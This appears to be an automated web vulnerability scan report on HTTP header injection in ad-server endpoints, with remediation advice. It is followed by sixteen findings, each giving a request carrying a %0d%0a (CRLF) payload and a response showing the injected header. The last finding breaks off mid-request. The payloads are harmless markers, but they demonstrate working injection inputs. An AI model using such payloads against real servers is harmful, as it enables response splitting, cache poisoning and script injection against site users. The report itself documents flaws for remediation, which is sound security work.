HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://ad-apac.vulnerable.ad.partner/pfadx/vid.drive/cars/carreviews [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/pfadx/vid.drive/cars/carreviews

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 5b218%0d%0adec391040c9 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/vid.drive/cars/carreviews?5b218%0d%0adec391040c9=1 HTTP/1.1
Host: ad-apac.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 947
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 23:35:45 GMT
Expires: Mon, 22 Nov 2010 23:35:45 GMT
DCLK_imp: v7;x;230055096;0-0;0;51299091;160/600;38640255/38658012/1;;~aopt=2/1/18/2;~okv=;5b218
dec391040c9=1;bsg=105046;bsg=105603;;~cs=i:
Connection: close



<script language="JavaScript" type="text/javascript">
var sd = "";
sd += "&keyword=";
var cb =
...[SNIP]...

1.2. http://ad-apac.vulnerable.ad.partner/pfadx/vid.smh [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/pfadx/vid.smh

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 401c9%0d%0ac60e0e62f99 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/vid.smh?401c9%0d%0ac60e0e62f99=1 HTTP/1.1
Host: ad-apac.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 947
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 23:35:43 GMT
Expires: Mon, 22 Nov 2010 23:35:43 GMT
DCLK_imp: v7;x;230055096;0-0;0;51294581;160/600;38640255/38658012/1;;~aopt=2/1/18/2;~okv=;401c9
c60e0e62f99=1;bsg=105046;bsg=105603;;~cs=q:
Connection: close



<script language="JavaScript" type="text/javascript">
var sd = "";
sd += "&keyword=";
var cb =
...[SNIP]...

1.3. http://ad-apac.vulnerable.ad.partner/pfadx/vid.smh/bus/businessday [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/pfadx/vid.smh/bus/businessday

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 55277%0d%0a7092f858a64 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/vid.smh/bus/businessday?55277%0d%0a7092f858a64=1 HTTP/1.1
Host: ad-apac.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 947
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 23 Nov 2010 00:05:00 GMT
Expires: Tue, 23 Nov 2010 00:05:00 GMT
DCLK_imp: v7;x;230055096;0-0;0;51299603;160/600;38640255/38658012/1;;~aopt=2/1/18/2;~okv=;55277
7092f858a64=1;bsg=105046;bsg=105603;bsg=105702;bsg=105856;;~cs=h:
Connection: close



<script language="JavaScript" type="text/javascript">
var sd = "";
sd += "&keyword=";
var cb =
...[SNIP]...

1.4. http://ad-apac.vulnerable.ad.partner/pfadx/vid.smh/bus/onthemoney [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/pfadx/vid.smh/bus/onthemoney

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload da127%0d%0ab9538652125 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/vid.smh/bus/onthemoney?da127%0d%0ab9538652125=1 HTTP/1.1
Host: ad-apac.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 947
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 23 Nov 2010 00:05:00 GMT
Expires: Tue, 23 Nov 2010 00:05:00 GMT
DCLK_imp: v7;x;230055096;0-0;0;51299619;160/600;38640255/38658012/1;;~aopt=2/1/18/2;~okv=;da127
b9538652125=1;bsg=105046;bsg=105603;bsg=105702;bsg=105856;;~cs=s:
Connection: close



<script language="JavaScript" type="text/javascript">
var sd = "";
sd += "&keyword=";
var cb =
...[SNIP]...

1.5. http://ad-apac.vulnerable.ad.partner/pfadx/vid.smh/ent/redcarpet [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/pfadx/vid.smh/ent/redcarpet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 4fd74%0d%0af6642234c60 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/vid.smh/ent/redcarpet?4fd74%0d%0af6642234c60=1 HTTP/1.1
Host: ad-apac.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 947
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 23:35:46 GMT
Expires: Mon, 22 Nov 2010 23:35:46 GMT
DCLK_imp: v7;x;230055096;0-0;0;51299574;160/600;38640255/38658012/1;;~aopt=2/1/18/2;~okv=;4fd74
f6642234c60=1;bsg=105046;bsg=105603;;~cs=o:
Connection: close



<script language="JavaScript" type="text/javascript">
var sd = "";
sd += "&keyword=";
var cb =
...[SNIP]...

1.6. http://ad-apac.vulnerable.ad.partner/pfadx/vid.smh/news/nationalnews [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/pfadx/vid.smh/news/nationalnews

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload a9b36%0d%0a21a1e652e44 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/vid.smh/news/nationalnews?a9b36%0d%0a21a1e652e44=1 HTTP/1.1
Host: ad-apac.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 947
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 23:35:47 GMT
Expires: Mon, 22 Nov 2010 23:35:47 GMT
DCLK_imp: v7;x;230055096;0-0;0;51299543;160/600;38640255/38658012/1;;~aopt=2/1/18/2;~okv=;a9b36
21a1e652e44=1;bsg=105046;bsg=105603;;~cs=z:
Connection: close



<script language="JavaScript" type="text/javascript">
var sd = "";
sd += "&keyword=";
var cb =
...[SNIP]...

1.7. http://ad-apac.vulnerable.ad.partner/pfadx/vid.smh/news/selections [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/pfadx/vid.smh/news/selections

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 2be0a%0d%0ad91b4142f9c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/vid.smh/news/selections?2be0a%0d%0ad91b4142f9c=1 HTTP/1.1
Host: ad-apac.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 947
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 23:35:48 GMT
Expires: Mon, 22 Nov 2010 23:35:48 GMT
DCLK_imp: v7;x;230055096;0-0;0;51299546;160/600;38640255/38658012/1;;~aopt=2/1/18/2;~okv=;2be0a
d91b4142f9c=1;bsg=105046;bsg=105603;;~cs=t:
Connection: close



<script language="JavaScript" type="text/javascript">
var sd = "";
sd += "&keyword=";
var cb =
...[SNIP]...

1.8. http://ad-apac.vulnerable.ad.partner/pfadx/vid.smh/news/worldnews [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/pfadx/vid.smh/news/worldnews

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload de473%0d%0aac4c7bc65ef was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/vid.smh/news/worldnews?de473%0d%0aac4c7bc65ef=1 HTTP/1.1
Host: ad-apac.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 947
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 23:35:49 GMT
Expires: Mon, 22 Nov 2010 23:35:49 GMT
DCLK_imp: v7;x;230055096;0-0;0;51299549;160/600;38640255/38658012/1;;~aopt=2/1/18/2;~okv=;de473
ac4c7bc65ef=1;bsg=105046;bsg=105603;;~cs=n:
Connection: close



<script language="JavaScript" type="text/javascript">
var sd = "";
sd += "&keyword=";
var cb =
...[SNIP]...

1.9. http://ad-apac.vulnerable.ad.partner/pfadx/vid.smh/sport/sportshq [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/pfadx/vid.smh/sport/sportshq

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload cdeb3%0d%0aa6673a6b938 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/vid.smh/sport/sportshq?cdeb3%0d%0aa6673a6b938=1 HTTP/1.1
Host: ad-apac.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 947
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 23:35:50 GMT
Expires: Mon, 22 Nov 2010 23:35:50 GMT
DCLK_imp: v7;x;230055096;0-0;0;51299644;160/600;38640255/38658012/1;;~aopt=2/1/18/2;~okv=;cdeb3
a6673a6b938=1;bsg=105046;bsg=105603;;~cs=t:
Connection: close



<script language="JavaScript" type="text/javascript">
var sd = "";
sd += "&keyword=";
var cb =
...[SNIP]...

1.10. http://ad-apac.vulnerable.ad.partner/pfadx/vid.wa/news/selections [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/pfadx/vid.wa/news/selections

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 1d37c%0d%0a246b21c040a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/vid.wa/news/selections?1d37c%0d%0a246b21c040a=1 HTTP/1.1
Host: ad-apac.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 947
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 23 Nov 2010 00:05:01 GMT
Expires: Tue, 23 Nov 2010 00:05:01 GMT
DCLK_imp: v7;x;230055096;0-0;0;51300587;160/600;38640255/38658012/1;;~aopt=2/1/18/2;~okv=;1d37c
246b21c040a=1;bsg=105046;bsg=105603;bsg=105702;bsg=105856;;~cs=t:
Connection: close



<script language="JavaScript" type="text/javascript">
var sd = "";
sd += "&keyword=";
var cb =
...[SNIP]...

1.11. http://ad.au.vulnerable.ad.partner/adj/ndm.news/home [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adj/ndm.news/home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2a7c2%0d%0ac68cb961990 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2a7c2%0d%0ac68cb961990/ndm.news/home HTTP/1.1
Host: ad.au.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.0 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2a7c2
c68cb961990/ndm.news/home

<h1>Error 302 Moved Temporarily</h1>

1.12. http://ad.au.vulnerable.ad.partner/adj/ndm.tst/business [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adj/ndm.tst/business

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2441a%0d%0a4b1ac4f02cf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2441a%0d%0a4b1ac4f02cf/ndm.tst/business HTTP/1.1
Host: ad.au.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.0 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2441a
4b1ac4f02cf/ndm.tst/business

<h1>Error 302 Moved Temporarily</h1>

1.13. http://vulnerable.ad.partner/ad/N4270.154361.33ACROSS.COM/B4882358.3 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/ad/N4270.154361.33ACROSS.COM/B4882358.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2513a%0d%0a979bb37379f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2513a%0d%0a979bb37379f/N4270.154361.33ACROSS.COM/B4882358.3 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2513a
979bb37379f/N4270.154361.33ACROSS.COM/B4882358.3:
Date: Mon, 22 Nov 2010 23:35:46 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.14. http://vulnerable.ad.partner/ad/N4390.aod-invite.comOX15921/B4977097.2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/ad/N4390.aod-invite.comOX15921/B4977097.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 688ad%0d%0adcf01932471 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /688ad%0d%0adcf01932471/N4390.aod-invite.comOX15921/B4977097.2 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/688ad
dcf01932471/N4390.aod-invite.comOX15921/B4977097.2:
Date: Mon, 22 Nov 2010 23:35:47 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.15. http://vulnerable.ad.partner/adi/N1558.154361.9712890756521/B4473299.3 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N1558.154361.9712890756521/B4473299.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 67692%0d%0ac73f3fc864 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /67692%0d%0ac73f3fc864/N1558.154361.9712890756521/B4473299.3 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/67692
c73f3fc864/N1558.154361.9712890756521/B4473299.3:
Date: Mon, 22 Nov 2010 23:35:48 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.16. http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4270.154361.33ACROSS.COM/B4882358.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9a409%0d%0ab939bb21da4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9a409%0d%0ab939bb21da4/N4270.154361.33ACROSS.COM/B4882358.3;sz=300x250;click=http://ad.yieldmanager.com/clk?2,13%3B2ee8284f76301d5d%3B12c75dac2fa,0%3B%3B%3B390997679,zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAA-MLadSwBAAAAAAAAAGM0MzY3MWVjLWY2OGQtMTFkZi04M2ZiLTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-63096&campID=43623&crID=63096&pubICode=2101142&pub=256078&partnerID=38&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport&redirectURL=;ord={CACHEBUSTER}? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxmMGKuN..j-mcGfTz2MFQHZPHhZqDRBAHGlfLwOEFkDhehSuR2EQQM5gkDWl-RZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTbu9EA90zCW7Lm0YQBIrfyiyKwLhZ3Z-5UiUtAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D300x250%26s%3D814544%26r%3D1%26_salt%3D1223098767%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c43671ec-f68d-11df-83fb-003048d702c4
Accept-Language: en-US
